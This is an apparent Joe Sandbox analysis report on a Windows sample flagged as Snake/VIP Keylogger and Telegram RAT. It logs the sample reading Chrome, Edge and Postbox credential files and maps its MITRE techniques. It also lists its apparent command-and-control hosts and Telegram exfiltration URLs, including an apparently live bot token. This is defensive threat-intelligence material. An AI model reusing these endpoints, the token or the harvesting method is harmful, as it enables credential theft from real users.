Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\66776676676.exe

0_2_0040322B

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 2720, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 2720, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 2720, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match

File source: 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Virtualization/Sandbox Evasion	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
66776676676.exe	39%	ReversingLabs	Win32.Spyware.Snakekeylogger
66776676676.exe	36%	Virustotal		Browse
66776676676.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nszF56F.tmp\nsExec.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://www.google.comGGI	0%	Avira URL Cloud	safe
https://www.google.comG	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	216.58.208.238	true	false	high
drive.usercontent.google.com	172.217.17.65	true	false	high
reallyfreegeoip.org	172.67.177.134	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20and%20Time:%2020/12/2024%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20927537%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434550993&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	msiexec.exe, 00000006.00000002.2994091106.0000000025192000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000001.00000002.2434001169.0000000007A59000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000002.2980289658.000000000968F000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.comG	msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.org	msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	msiexec.exe, 00000006.00000002.2995674935.00000000260FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002622C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	66776676676.exe, 00000000.00000002.1733485828.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 66776676676.exe, 00000000.00000000.1723187751.0000000000409000.00000008.00000001.01000000.00000003.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	msiexec.exe, 00000006.00000002.2995674935.00000000260FD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002622C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000006.00000002.2994091106.0000000025170000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000025161000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.00000000250B7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000006.00000003.2552145840.00000000096A3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	66776676676.exe, 66776676676.exe, 00000000.00000002.1733485828.0000000000409000.00000004.00000001.01000000.00000003.sdmp, 66776676676.exe, 00000000.00000000.1723187751.0000000000409000.00000008.00000001.01000000.00000003.sdmp	false		high
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.2425707404.00000000051A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000006.00000002.2980289658.000000000961A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	msiexec.exe, 00000006.00000002.2995674935.0000000026207000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.0000000026232000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002630A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002608E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.2425707404.00000000052F7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.2431094708.000000000620A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:927537%0D%0ADate%20a	msiexec.exe, 00000006.00000002.2994091106.0000000025093000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.comGGI	msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://apis.google.com	msiexec.exe, 00000006.00000003.2552341601.00000000096D4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	msiexec.exe, 00000006.00000002.2995674935.0000000026207000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.0000000026232000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002630A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.000000002608E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2995674935.00000000260D8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.2425707404.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2994091106.0000000024FB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot7557203423:AAGe1HpB3h500YMl-g1jm79Gu1CeWQ1Wrtg/sendDocument?chat_id=5434	msiexec.exe, 00000006.00000002.2994091106.000000002512E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000006.00000002.2994091106.0000000024FFD000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
193.122.130.0	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
172.217.17.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
216.58.208.238	drive.google.com	United States	15169	GOOGLEUS	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578053
Start date and time:	2024-12-19 08:17:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	66776676676.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/14@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 96% Number of executed functions: 137 Number of non-executed functions: 53
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 2720 because it is empty
Execution Graph export aborted for target powershell.exe, PID 1448 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:18:05	API Interceptor	44x Sleep call for process: powershell.exe modified
02:19:37	API Interceptor	286x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	chrome11.exe	Get hash	malicious	Unknown	Browse
	chrome11.exe	Get hash	malicious	Unknown	Browse
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
193.122.130.0	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	ref_97024130865.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
